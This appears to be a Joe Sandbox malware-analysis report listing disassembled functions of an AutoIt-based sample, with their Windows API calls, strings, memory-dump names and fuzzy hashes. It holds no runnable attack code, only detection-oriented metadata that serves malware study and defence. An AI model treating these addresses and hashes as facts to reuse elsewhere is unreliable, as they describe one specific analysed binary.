Opcode Fuzzy Hash: c3d1032bc67b52c744304efb837e4bdd47320f366c8141c7be189f5e132af478
Instruction Fuzzy Hash: 3FE0ED72945228BAEB205FA2DC0EFDB7F5CEF657A1F408033B50D95060CA759980CBA8

Function 0044BDF8 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 0044BE01
OpenThreadToken.ADVAPI32(00000000), ref: 0044BE08
GetCurrentProcess.KERNEL32(00000028,?), ref: 0044BE15
OpenProcessToken.ADVAPI32(00000000), ref: 0044BE1C

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 52582e10df0b23de2b7ea7e8fc3051ce9614d92079c270e08622226ea1a56a0c
Instruction ID: c006eac33c66ffd5f108ed0f1fb19f13f2f945f10cd585b09cd30ea7a3c5f87d
Opcode Fuzzy Hash: 52582e10df0b23de2b7ea7e8fc3051ce9614d92079c270e08622226ea1a56a0c
Instruction Fuzzy Hash: C3E08632A41211ABE7201FB19D0CBA77BA8EFA4796F108839F641DA040E7388442C769

Function 0042B0AC Relevance: 6.0, APIs: 4, Instructions: 22COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 0042B0C5
SetTextColor.GDI32(?,000000FF), ref: 0042B0CF
SetBkMode.GDI32(?,00000001), ref: 0042B0E4
GetStockObject.GDI32(00000005), ref: 0042B0EC
GetWindowDC.USER32(?,00000000), ref: 0048ECFA
GetPixel.GDI32(00000000,00000000,00000000), ref: 0048ED07
GetPixel.GDI32(00000000,?,00000000), ref: 0048ED20
GetPixel.GDI32(00000000,00000000,?), ref: 0048ED39
GetPixel.GDI32(00000000,?,?), ref: 0048ED59
ReleaseDC.USER32(?,00000000), ref: 0048ED64

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: 93cc25a195d6f1c1bc47a948dadf73c42b0c90047d36a11a82ab97708c300906
Instruction ID: 29786a16fa1a832a618eb2fe8754ebb53fbd57684643214d7b75e6863e398fb1
Opcode Fuzzy Hash: 93cc25a195d6f1c1bc47a948dadf73c42b0c90047d36a11a82ab97708c300906
Instruction Fuzzy Hash: 4AE06D32900240BEEB211F75AC4AB993B21AB65335F008237F769580E2C3754940CB15

Function 0044EAD5 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 0044ECA0

Strings

Container, xrefs: 0044EC1F
AutoIt3GUI, xrefs: 0044EC18

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container
API String ID: 3565006973-3941886329
Opcode ID: 9d82080af6df340e8e7a6208c5e71092008119e8e040c8246424033e8cf1b4ed
Instruction ID: 8aa7bf3b467eaa7bd55d52c6a5ba331adc1682144e2f309126dbeee480f1c0e3
Opcode Fuzzy Hash: 9d82080af6df340e8e7a6208c5e71092008119e8e040c8246424033e8cf1b4ed
Instruction Fuzzy Hash: 52914AB4600702AFEB14CF65C884B66BBA5FF48710F24856EE946CB391DBB9E841CB54

Function 0045E704 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 200shareCOMMON

Download Yara Rule

APIs

Part of subcall function 00413BCF: _wcscpy.LIBCMT ref: 00413BF2

Part of subcall function 004184A6: __swprintf.LIBCMT ref: 004184E5
Part of subcall function 004184A6: __itow.LIBCMT ref: 00418519

__wcsnicmp.LIBCMT ref: 0045E785
WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0045E84E

Strings

LPT, xrefs: 0045E77F

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
String ID: LPT
API String ID: 3222508074-1350329615
Opcode ID: fdd0cab07b5cd193746b87607c02892ee4694dbe8a763f6ce6a7d4cb6fae4b7f
Instruction ID: a311484cdf7eaf7e68e9c75861ee8d0002dfed9ce20751092882e5aeb47df806
Opcode Fuzzy Hash: fdd0cab07b5cd193746b87607c02892ee4694dbe8a763f6ce6a7d4cb6fae4b7f
Instruction Fuzzy Hash: AF619675A00215AFCB18EF55C895EAEB7B4EF08311F00405FF946AB391DB34AE48CB59

Function 00411B72 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00411B83
GlobalMemoryStatusEx.KERNEL32 ref: 00411B9C

Strings

@, xrefs: 00411B91

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: d09292c62be2364f902922a7a223746af005dd9d6ee463ed116b5e8de15d3478
Instruction ID: 5917678d5b6ffaf7edec8cacf5b2128a48c87a8a93ad546a639ff2c69e6cbb62
Opcode Fuzzy Hash: d09292c62be2364f902922a7a223746af005dd9d6ee463ed116b5e8de15d3478
Instruction Fuzzy Hash: 33517C71508744ABE320AF10E885BABBBECFF94354F81485DF5C841065EFB5856CC75A

Function 0045CE59 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 0041417D: __fread_nolock.LIBCMT ref: 0041419B

_wcscmp.LIBCMT ref: 0045CF49
_wcscmp.LIBCMT ref: 0045CF5C

Strings

FILE, xrefs: 0045CE91

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: fbd930c38033b30fdc9ae7591a5288819f9ae7b11b7692a0854239e0e8fdd801
Instruction ID: fca6feef9138ea779bd72007f9fc343b3921c4e55a9d027619339161a6df896d
Opcode Fuzzy Hash: fbd930c38033b30fdc9ae7591a5288819f9ae7b11b7692a0854239e0e8fdd801
Instruction Fuzzy Hash: 85410632A00219BEDF10DBA5CC81FEF7BB99F89714F00046EF901A7181D7799A88C758

Function 00439AF3 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 127COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0043889E: __getptd_noexit.LIBCMT ref: 0043889E

__getbuf.LIBCMT ref: 00439B8A
__lseeki64.LIBCMT ref: 00439BFA

Strings

pMD, xrefs: 00439AF7, 00439C29, 00439AFB, 00439B89, 00439BB3

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: __getbuf__getptd_noexit__lseeki64
String ID: pMD
API String ID: 3311320906-2681603459
Opcode ID: c0dfa4c06be7939c5730f6335142b7333f90c23ec2b3756c38155cea6ca2c832
Instruction ID: f6337f3094684b107575306c66b21c43e51866b4ed598388dbda47a870081b89
Opcode Fuzzy Hash: c0dfa4c06be7939c5730f6335142b7333f90c23ec2b3756c38155cea6ca2c832
Instruction Fuzzy Hash: 08412371500B059ED7349B29D891A7BB7E4AF49324F04A61FE4BA873D1D3BCEC018B59

Function 0047A578 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000027,00001132,00000000,?), ref: 0047A668
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0047A67D

Strings

', xrefs: 0047A5D1

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 8cf8bcedb410036446b0eed065d70096d662e771ae57b506bd3ddbe066f1788b
Instruction ID: 63798d8fb8a43944ad955ded0750e4c2a996d1248986eebaf19a93dd6f78adf9
Opcode Fuzzy Hash: 8cf8bcedb410036446b0eed065d70096d662e771ae57b506bd3ddbe066f1788b
Instruction Fuzzy Hash: AD412575A01209AFDB14CFA8C880BDE7BB5FB48300F14406AE909EB381D774A952CFA5

Function 00479567 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 0047961B
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00479657

Strings

static, xrefs: 004795B7

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: 6f0d1999a940c103c180a763e6667ad654866e25679a229e76b3a40e1d2f3fd5
Instruction ID: b816b13599207560ab615374ee9d0d0e3e6a45954e6cc1aec0073b7d76cdbac9
Opcode Fuzzy Hash: 6f0d1999a940c103c180a763e6667ad654866e25679a229e76b3a40e1d2f3fd5
Instruction Fuzzy Hash: C0318F31500604AEEB109F64DC80BFB77A9FF58764F10861AF9A9C7190CA759C91D768

Function 00455B75 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00455BE4
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00455C1F

Strings

0, xrefs: 00455BDD

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 014b33f5ccc489fe5b0386c7ce138ec9178d5efc88008c27672f2ca2d8c1eb63
Instruction ID: 657220478af4133721f9cb07855e425f6c73845cbb1f5e59d19638cbe0e5be98
Opcode Fuzzy Hash: 014b33f5ccc489fe5b0386c7ce138ec9178d5efc88008c27672f2ca2d8c1eb63
Instruction Fuzzy Hash: 1731C831500305EBDB268F99C895BBE7BF4AF05355F18401FED81962A2D7789A48CB15

Function 00466B60 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON

Download Yara Rule

APIs

__snwprintf.LIBCMT ref: 00466BDD

Part of subcall function 0041CAEE: _memmove.LIBCMT ref: 0041CB2F

Strings

AUTOITCALLVARIABLE%d, xrefs: 00466BCF
, $, xrefs: 00466C1D

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: __snwprintf_memmove
String ID: , $$AUTOITCALLVARIABLE%d
API String ID: 3506404897-2584243854
Opcode ID: 4f315c3ed15c9a6d877a2234094bf9d510c939d01064606714e6b5fbee65cab8
Instruction ID: 7d9fe75de7a3c7df516b55ea32382e6f735100487b91b4e0d99cbf1db44c3fb4
Opcode Fuzzy Hash: 4f315c3ed15c9a6d877a2234094bf9d510c939d01064606714e6b5fbee65cab8
Instruction Fuzzy Hash: A121A071600518AACF00EF95CC82FDE77A5AF45704F10446AF505AB142E778EE51CBAA

Function 004791DC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00479269
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00479274

Strings

Combobox, xrefs: 00479236

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 5e150ab3108470127bc0f2bae1fa0cbe1038d60c70f2b7ed01106fe5787f5d40
Instruction ID: 7fd9b8195b702e9918b1912d8f16c8b7567ad2957eb7dc112c4ba119e0d460b2
Opcode Fuzzy Hash: 5e150ab3108470127bc0f2bae1fa0cbe1038d60c70f2b7ed01106fe5787f5d40
Instruction Fuzzy Hash: 36119371300208BFEF11DE54DC80EEB376AEB883A4F118566F91897291D6799C5187A8

Function 0047970B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 0042C619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0042C657
Part of subcall function 0042C619: GetStockObject.GDI32(00000011), ref: 0042C66B
Part of subcall function 0042C619: SendMessageW.USER32(00000000,00000030,00000000), ref: 0042C675

GetWindowRect.USER32(00000000,?), ref: 00479775
GetSysColor.USER32(00000012), ref: 0047978F

Strings

static, xrefs: 00479752

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 9b5557710a90260a347f4b243c0e65d50bd818e5637129d9d791b39dcb4ec3c7
Instruction ID: 094c9502403f8640bc552f8cecb522b7a50e081ca446b0ea17a0a677fd587438
Opcode Fuzzy Hash: 9b5557710a90260a347f4b243c0e65d50bd818e5637129d9d791b39dcb4ec3c7
Instruction Fuzzy Hash: B3116A76620209EFDB04DFB8CC45EEA7BB8EB08314F00452AF955D3250D738E851DB54

Function 00479424 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 004794A6
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004794B5

Strings

edit, xrefs: 0047948A

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: 5d09e1a014cfd6d2cb88db9db06a133cc801d205df713c5af619ac4e86506401
Instruction ID: ac0510d73b837c64bf5e945ab341c98fc756068cf9c98cd7de8ee51be7d1ebc5
Opcode Fuzzy Hash: 5d09e1a014cfd6d2cb88db9db06a133cc801d205df713c5af619ac4e86506401
Instruction Fuzzy Hash: A5118F71504104AFEF108E64DC80EEB3769EF15378F508726F969932E0C779DC529B68

Function 00455C80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00455CF3
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00455D12

Strings

0, xrefs: 00455CEC

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 71c6004557eadbd4460d87852136bccb7dff938f340263e4ae9ad5c6357e63a2
Instruction ID: 01ddf712df417375ba0d80947ea12795556f5c83140f7283f97827f73b30f7c6
Opcode Fuzzy Hash: 71c6004557eadbd4460d87852136bccb7dff938f340263e4ae9ad5c6357e63a2
Instruction Fuzzy Hash: 9A11D672D01618BBEB21DB58E858BBE77F89B05305F154023EC41E72A2D3749D0CD799

Function 004653F6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0046544C
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00465475

Strings

<local>, xrefs: 0046543D

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: da187043347ec23c024dfcae173d9279948534bc018b7bb972f8bcbfa2bc1368
Instruction ID: 986467eb1641449c6b52daf50b82b6dfa849323f00e4b820079cb2e2edaf2fdf
Opcode Fuzzy Hash: da187043347ec23c024dfcae173d9279948534bc018b7bb972f8bcbfa2bc1368
Instruction Fuzzy Hash: C911CE70541A21BACB248F518C84FFBBAA8EF12756F1082ABF50582140FA786980C6F6

Function 0043B4BF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00444557
___raise_securityfailure.LIBCMT ref: 0044463E

Strings

(M, xrefs: 00444639

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
